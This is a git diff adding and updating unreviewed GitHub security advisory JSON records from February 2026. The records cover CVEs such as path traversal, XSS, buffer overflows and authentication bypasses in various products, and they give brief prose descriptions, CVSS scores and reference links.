a/advisories/unreviewed/2026/02/GHSA-47fm-95xj-vfvg/GHSA-47fm-95xj-vfvg.json b/advisories/unreviewed/2026/02/GHSA-47fm-95xj-vfvg/GHSA-47fm-95xj-vfvg.json new file mode 100644 index 0000000000000..a4841be4a4dbc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-47fm-95xj-vfvg/GHSA-47fm-95xj-vfvg.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-47fm-95xj-vfvg", + "modified": "2026-02-11T18:31:28Z", + "published": "2026-02-11T18:31:28Z", + "aliases": [ + "CVE-2025-64075" + ], + "details": "A path traversal vulnerability in the check_token function of Shenzhen Zhibotong Electronics ZBT WE2001 23.09.27 allows remote attackers to bypass authentication and perform administrative actions by supplying a crafted session cookie value.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64075" + }, + { + "type": "WEB", + "url": "https://neutsec.io/advisories/cve-2025-64075" + }, + { + "type": "WEB", + "url": "https://www.zbtwifi.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T16:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6wm3-23gq-r92x/GHSA-6wm3-23gq-r92x.json b/advisories/unreviewed/2026/02/GHSA-6wm3-23gq-r92x/GHSA-6wm3-23gq-r92x.json new file mode 100644 index 0000000000000..33800d53ac73f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6wm3-23gq-r92x/GHSA-6wm3-23gq-r92x.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6wm3-23gq-r92x", + "modified": "2026-02-11T18:31:29Z", + "published": "2026-02-11T18:31:28Z", + "aliases": [ + "CVE-2026-25868" + ], + "details": "MiniGal Nano version 0.3.5 and prior contain a reflected cross-site scripting (XSS) vulnerability in index.php via the dir parameter. The application constructs $currentdir from user-controlled input and embeds it into an error message without output encoding, allowing an attacker to supply HTML/JavaScript that is reflected in the response. Successful exploitation can lead to execution of arbitrary script in a victim's browser in the context of the vulnerable application.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25868" + }, + { + "type": "WEB", + "url": "https://sourceforge.net/projects/minigalnano" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20180330004313/http://www.minigal.dk/minigal-nano.html" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/minigal-nano-reflected-xss-via-dir-parameter" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T16:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-76gx-97cq-65f5/GHSA-76gx-97cq-65f5.json b/advisories/unreviewed/2026/02/GHSA-76gx-97cq-65f5/GHSA-76gx-97cq-65f5.json new file mode 100644 index 0000000000000..b4c4c8f0b8c22 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-76gx-97cq-65f5/GHSA-76gx-97cq-65f5.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-76gx-97cq-65f5", + "modified": "2026-02-11T18:31:28Z", + "published": "2026-02-11T18:31:28Z", + "aliases": [ + "CVE-2026-1837" + ], + "details": "A specially-crafted file can cause libjxl's decoder to write pixel data to uninitialized unallocated memory. Soon after that data from another uninitialized unallocated region is copied to pixel data.\n\nThis can be done by requesting color transformation of grayscale images to another grayscale color space. Buffers allocated for 1-float-per-pixel are used as if they are allocated for 3-float-per-pixel. That happens only if LCMS2 is used as CMS engine. There is another CMS engine available (selected by build flags).", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1837" + }, + { + "type": "WEB", + "url": "https://github.com/libjxl/libjxl/issues/4549" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-805" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T16:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-92fh-27vv-894w/GHSA-92fh-27vv-894w.json b/advisories/unreviewed/2026/02/GHSA-92fh-27vv-894w/GHSA-92fh-27vv-894w.json new file mode 100644 index 0000000000000..e4c6f431a411c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-92fh-27vv-894w/GHSA-92fh-27vv-894w.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-92fh-27vv-894w", + "modified": "2026-02-11T18:31:30Z", + "published": "2026-02-11T18:31:30Z", + "aliases": [ + "CVE-2025-69874" + ], + "details": "nanotar through 0.2.0 has a path traversal vulnerability in parseTar() and parseTarGzip() that allows remote attackers to write arbitrary files outside the intended extraction directory via a crafted tar archive containing path traversal sequence.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69874" + }, + { + "type": "WEB", + "url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69874-nanotar-Path-Traversal.md" + }, + { + "type": "WEB", + "url": "https://github.com/unjs/nanotar" + }, + { + "type": "WEB", + "url": "https://www.npmjs.com/package/nanotar" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T18:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9gvg-fw8p-72fv/GHSA-9gvg-fw8p-72fv.json b/advisories/unreviewed/2026/02/GHSA-9gvg-fw8p-72fv/GHSA-9gvg-fw8p-72fv.json new file mode 100644 index 0000000000000..e4d80575a1a55 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9gvg-fw8p-72fv/GHSA-9gvg-fw8p-72fv.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9gvg-fw8p-72fv", + "modified": "2026-02-11T18:31:28Z", + "published": "2026-02-11T18:31:28Z", + "aliases": [ + "CVE-2025-12474" + ], + "details": "A specially-crafted file can cause libjxl's decoder to read pixel data from uninitialized (but allocated) memory.\n\nThis can be done by causing the decoder to reference an outside-image-bound area in a subsequent patches. An incorrect optimization causes the decoder to omit populating those areas.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12474" + }, + { + "type": "WEB", + "url": "https://github.com/libjxl/libjxl/pull/4495" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-908" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T16:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9jhc-rr6j-x87m/GHSA-9jhc-rr6j-x87m.json b/advisories/unreviewed/2026/02/GHSA-9jhc-rr6j-x87m/GHSA-9jhc-rr6j-x87m.json new file mode 100644 index 0000000000000..e587d3b391fe0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9jhc-rr6j-x87m/GHSA-9jhc-rr6j-x87m.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9jhc-rr6j-x87m", + "modified": "2026-02-11T18:31:30Z", + "published": "2026-02-11T18:31:30Z", + "aliases": [ + "CVE-2025-70084" + ], + "details": "Directory traversal vulnerability in OpenSatKit 2.2.1 allows attackers to gain access to sensitive information or delete arbitrary files via crafted value to the FileUtil_GetFileInfo function.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70084" + }, + { + "type": "WEB", + "url": "https://gist.github.com/jonafk555" + }, + { + "type": "WEB", + "url": "https://github.com/OpenSatKit/OpenSatKit" + }, + { + "type": "WEB", + "url": "https://github.com/OpenSatKit/OpenSatKit/releases/tag/v2.2.1" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/OpenSatKit/OpenSatKit/master/cfs/apps/filemgr/fsw/src/dir.c" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T18:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cpfh-q3v8-wj73/GHSA-cpfh-q3v8-wj73.json b/advisories/unreviewed/2026/02/GHSA-cpfh-q3v8-wj73/GHSA-cpfh-q3v8-wj73.json new file mode 100644 index 0000000000000..291d47954c6e3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cpfh-q3v8-wj73/GHSA-cpfh-q3v8-wj73.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cpfh-q3v8-wj73", + "modified": "2026-02-11T18:31:31Z", + "published": "2026-02-11T18:31:31Z", + "aliases": [ + "CVE-2026-0229" + ], + "details": "A denial-of-service (DoS) vulnerability in the Advanced DNS Security (ADNS) feature of Palo Alto Networks PAN-OS® software enables an unauthenticated attacker to initiate system reboots using a maliciously crafted packet. Repeated attempts to initiate a reboot causes the firewall to enter maintenance mode.\n\nCloud NGFW and Prisma Access® are not impacted by this vulnerability.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:D/RE:M/U:Amber" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0229" + }, + { + "type": "WEB", + "url": "https://security.paloaltonetworks.com/CVE-2026-0229" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-754" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T18:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f3pj-ph83-hp25/GHSA-f3pj-ph83-hp25.json b/advisories/unreviewed/2026/02/GHSA-f3pj-ph83-hp25/GHSA-f3pj-ph83-hp25.json index bd0ce7567ab22..301778701935d 100644 --- a/advisories/unreviewed/2026/02/GHSA-f3pj-ph83-hp25/GHSA-f3pj-ph83-hp25.json +++ b/advisories/unreviewed/2026/02/GHSA-f3pj-ph83-hp25/GHSA-f3pj-ph83-hp25.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-122" + "CWE-122", + "CWE-787" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-g3vf-cx4m-ph4q/GHSA-g3vf-cx4m-ph4q.json b/advisories/unreviewed/2026/02/GHSA-g3vf-cx4m-ph4q/GHSA-g3vf-cx4m-ph4q.json new file mode 100644 index 0000000000000..e59742b610a75 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g3vf-cx4m-ph4q/GHSA-g3vf-cx4m-ph4q.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g3vf-cx4m-ph4q", + "modified": "2026-02-11T18:31:30Z", + "published": "2026-02-11T18:31:30Z", + "aliases": [ + "CVE-2026-25084" + ], + "details": "Authentication for ZLAN5143D can be bypassed by directly accessing internal URLs.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25084" + }, + { + "type": "WEB", + "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-041-02.json" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-041-02" + }, + { + "type": "WEB", + "url": "https://www.zlmcu.com/en/contact_us.htm" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T17:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hfmq-6wjv-c7r3/GHSA-hfmq-6wjv-c7r3.json b/advisories/unreviewed/2026/02/GHSA-hfmq-6wjv-c7r3/GHSA-hfmq-6wjv-c7r3.json new file mode 100644 index 0000000000000..77bd821965684 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hfmq-6wjv-c7r3/GHSA-hfmq-6wjv-c7r3.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hfmq-6wjv-c7r3", + "modified": "2026-02-11T18:31:31Z", + "published": "2026-02-11T18:31:31Z", + "aliases": [ + "CVE-2025-70085" + ], + "details": "An issue was discovered in OpenSatKit 2.2.1. The EventErrStr buffer has a fixed size of 256 bytes. The code uses sprintf to format two filenames (Source1Filename and the string returned by FileUtil_FileStateStr) into this buffer without any length checking and without using bounded format specifiers such as %.*s. If the filename length approaches OS_MAX_PATH_LEN (commonly 64-256 bytes), the combined formatted string together with constant text can exceed 256 bytes, resulting in a stack buffer overflow. Such unsafe sprintf calls are scattered across multiple functions in file.c, including FILE_ConcatenateCmd() and ConcatenateFiles(), all of which fail to validate the output length.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70085" + }, + { + "type": "WEB", + "url": "https://gist.github.com/jonafk555" + }, + { + "type": "WEB", + "url": "https://github.com/OpenSatKit/OpenSatKit" + }, + { + "type": "WEB", + "url": "https://github.com/OpenSatKit/OpenSatKit/releases/tag/v2.2.1" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/OpenSatKit/OpenSatKit/master/cfs/apps/filemgr/fsw/src/file.c" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T18:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-j8fr-767f-7h52/GHSA-j8fr-767f-7h52.json b/advisories/unreviewed/2026/02/GHSA-j8fr-767f-7h52/GHSA-j8fr-767f-7h52.json new file mode 100644 index 0000000000000..1664e9861b85d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-j8fr-767f-7h52/GHSA-j8fr-767f-7h52.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j8fr-767f-7h52", + "modified": "2026-02-11T18:31:31Z", + "published": "2026-02-11T18:31:31Z", + "aliases": [ + "CVE-2026-0228" + ], + "details": "An improper certificate validation vulnerability in PAN-OS allows users to connect Terminal Server Agents on Windows to PAN-OS using expired certificates even if the PAN-OS configuration would not normally permit them to do so.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:D/RE:M/U:Amber" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0228" + }, + { + "type": "WEB", + "url": "https://security.paloaltonetworks.com/CVE-2026-0228" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T18:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jh5g-w5hx-478p/GHSA-jh5g-w5hx-478p.json b/advisories/unreviewed/2026/02/GHSA-jh5g-w5hx-478p/GHSA-jh5g-w5hx-478p.json new file mode 100644 index 0000000000000..6e9daae3734c6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jh5g-w5hx-478p/GHSA-jh5g-w5hx-478p.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jh5g-w5hx-478p", + "modified": "2026-02-11T18:31:30Z", + "published": "2026-02-11T18:31:30Z", + "aliases": [ + "CVE-2025-65480" + ], + "details": "An issue was discovered in Pacom Unison Client 5.13.1. Authenticated users can inject malicious scripts in the Report Templates which are executed when certain script conditions are fulfilled, leading to Remote Code Execution.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65480" + }, + { + "type": "WEB", + "url": "https://github.com/derekyjj/vulnerability-research/tree/main/CVE-2025-65480" + }, + { + "type": "WEB", + "url": "http://pacom.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T18:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m447-7fh7-88xc/GHSA-m447-7fh7-88xc.json b/advisories/unreviewed/2026/02/GHSA-m447-7fh7-88xc/GHSA-m447-7fh7-88xc.json new file mode 100644 index 0000000000000..efd3b28c1743f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m447-7fh7-88xc/GHSA-m447-7fh7-88xc.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m447-7fh7-88xc", + "modified": "2026-02-11T18:31:30Z", + "published": "2026-02-11T18:31:30Z", + "aliases": [ + "CVE-2025-70029" + ], + "details": "An issue in Sunbird-Ed SunbirdEd-portal v1.13.4 allows attackers to obtain sensitive information. The application disables TLS/SSL certificate validation by setting 'rejectUnauthorized': false in HTTP request options", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70029" + }, + { + "type": "WEB", + "url": "https://gist.github.com/zcxlighthouse/e662c8316f98a1c72735cda4f6bfcfe6" + }, + { + "type": "WEB", + "url": "https://github.com/Sunbird-Ed" + }, + { + "type": "WEB", + "url": "https://github.com/Sunbird-Ed/SunbirdEd-portal" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T18:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m9ff-h6c5-vghq/GHSA-m9ff-h6c5-vghq.json b/advisories/unreviewed/2026/02/GHSA-m9ff-h6c5-vghq/GHSA-m9ff-h6c5-vghq.json index fcdabce44d264..420b39ad24b9b 100644 --- a/advisories/unreviewed/2026/02/GHSA-m9ff-h6c5-vghq/GHSA-m9ff-h6c5-vghq.json +++ b/advisories/unreviewed/2026/02/GHSA-m9ff-h6c5-vghq/GHSA-m9ff-h6c5-vghq.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-m9ff-h6c5-vghq", - "modified": "2026-02-11T06:30:41Z", + "modified": "2026-02-11T18:31:28Z", "published": "2026-02-11T06:30:41Z", "aliases": [ "CVE-2026-1235" ], "details": "The WP eCommerce WordPress plugin through 3.15.1 unserializes user input via ajax actions, which could allow unauthenticated users to perform PHP Object Injection when a suitable gadget is present on the blog.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-502" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T06:15:51Z" diff --git a/advisories/unreviewed/2026/02/GHSA-mpr3-mc9x-rrgq/GHSA-mpr3-mc9x-rrgq.json b/advisories/unreviewed/2026/02/GHSA-mpr3-mc9x-rrgq/GHSA-mpr3-mc9x-rrgq.json new file mode 100644 index 0000000000000..1d2f7ddea974c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mpr3-mc9x-rrgq/GHSA-mpr3-mc9x-rrgq.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mpr3-mc9x-rrgq", + "modified": "2026-02-11T18:31:29Z", + "published": "2026-02-11T18:31:29Z", + "aliases": [ + "CVE-2025-13391" + ], + "details": "The Product Options and Price Calculation Formulas for WooCommerce – Uni CPO (Premium) plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'uni_cpo_remove_file' function in all versions up to, and including, 4.9.60. This makes it possible for unauthenticated attackers to delete arbitrary attachments or files stored in Dropbox if the file path is known. The vulnerability was partially patched in version 4.9.60.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13391" + }, + { + "type": "WEB", + "url": "https://builderius.io/cpo" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/289a4076-974f-4b0c-bfaa-83c1b2cb62ef?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T17:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p229-4rm7-jjq6/GHSA-p229-4rm7-jjq6.json b/advisories/unreviewed/2026/02/GHSA-p229-4rm7-jjq6/GHSA-p229-4rm7-jjq6.json index 4e0c33a8b8475..2dfcfc335076f 100644 --- a/advisories/unreviewed/2026/02/GHSA-p229-4rm7-jjq6/GHSA-p229-4rm7-jjq6.json +++ b/advisories/unreviewed/2026/02/GHSA-p229-4rm7-jjq6/GHSA-p229-4rm7-jjq6.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-p229-4rm7-jjq6", - "modified": "2026-02-04T03:30:46Z", + "modified": "2026-02-11T18:31:25Z", "published": "2026-02-04T03:30:46Z", "aliases": [ "CVE-2025-69621" ], "details": "An arbitrary file overwrite vulnerability in the file import process of Comic Book Reader v1.0.95 allows attackers to overwrite critical internal files, potentially leading to arbitrary code execution or exposure of sensitive information.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -32,8 +37,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-73" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-04T02:16:11Z" diff --git a/advisories/unreviewed/2026/02/GHSA-pc84-8mjq-pcg8/GHSA-pc84-8mjq-pcg8.json b/advisories/unreviewed/2026/02/GHSA-pc84-8mjq-pcg8/GHSA-pc84-8mjq-pcg8.json index 229962aa0413c..18a3e2baf6064 100644 --- a/advisories/unreviewed/2026/02/GHSA-pc84-8mjq-pcg8/GHSA-pc84-8mjq-pcg8.json +++ b/advisories/unreviewed/2026/02/GHSA-pc84-8mjq-pcg8/GHSA-pc84-8mjq-pcg8.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pc84-8mjq-pcg8", - "modified": "2026-02-04T15:30:29Z", + "modified": "2026-02-11T18:31:26Z", "published": "2026-02-04T15:30:29Z", "aliases": [ "CVE-2025-70997" ], "details": "A vulnerability has been discovered in eladmin v2.7 and before. This vulnerability allows for an arbitrary user password reset under any user permission level.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-04T15:16:13Z" diff --git a/advisories/unreviewed/2026/02/GHSA-pvgq-2pr4-wxj6/GHSA-pvgq-2pr4-wxj6.json b/advisories/unreviewed/2026/02/GHSA-pvgq-2pr4-wxj6/GHSA-pvgq-2pr4-wxj6.json index 3ab23ebfedbc0..83a8d81a00ee7 100644 --- a/advisories/unreviewed/2026/02/GHSA-pvgq-2pr4-wxj6/GHSA-pvgq-2pr4-wxj6.json +++ b/advisories/unreviewed/2026/02/GHSA-pvgq-2pr4-wxj6/GHSA-pvgq-2pr4-wxj6.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pvgq-2pr4-wxj6", - "modified": "2026-02-04T18:30:31Z", + "modified": "2026-02-11T18:31:25Z", "published": "2026-02-03T18:30:47Z", "aliases": [ "CVE-2025-70758" ], "details": "chetans9 core-php-admin-panel through commit a94a780d6 contains an authentication bypass vulnerability in includes/auth_validate.php. The application sends an HTTP redirect via header(Location:login.php) when a user is not authenticated but fails to call exit() afterward. This allows remote unauthenticated attackers to access protected pages.customer database.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-703" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-03T18:16:18Z" diff --git a/advisories/unreviewed/2026/02/GHSA-qwvg-xq53-3vw2/GHSA-qwvg-xq53-3vw2.json b/advisories/unreviewed/2026/02/GHSA-qwvg-xq53-3vw2/GHSA-qwvg-xq53-3vw2.json new file mode 100644 index 0000000000000..071847f8ce7a4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qwvg-xq53-3vw2/GHSA-qwvg-xq53-3vw2.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qwvg-xq53-3vw2", + "modified": "2026-02-11T18:31:30Z", + "published": "2026-02-11T18:31:30Z", + "aliases": [ + "CVE-2025-70083" + ], + "details": "An issue was discovered in OpenSatKit 2.2.1. The DirName field in the telecommand is provided by the ground segment and must be treated as untrusted input. The program copies DirName into the local buffer DirWithSep using strcpy. The size of this buffer is OS_MAX_PATH_LEN. If the length of DirName is greater than or equal to OS_MAX_PATH_LEN, a stack buffer overflow occurs, overwriting adjacent stack memory. The path length check (FileUtil_AppendPathSep) is performed after the strcpy operation, meaning the validation occurs too late and cannot prevent the overflow.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70083" + }, + { + "type": "WEB", + "url": "https://gist.github.com/jonafk555" + }, + { + "type": "WEB", + "url": "https://github.com/OpenSatKit/OpenSatKit" + }, + { + "type": "WEB", + "url": "https://github.com/OpenSatKit/OpenSatKit/releases/tag/v2.2.1" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/OpenSatKit/OpenSatKit/master/cfs/apps/filemgr/fsw/src/dir.c" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/OpenSatKit/OpenSatKit/master/cfs/apps/filemgr/fsw/src/dir.c#:~:text=strcpy%28DirWithSep" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T18:16:06Z" + } +} \ No newline at end of file diff --git 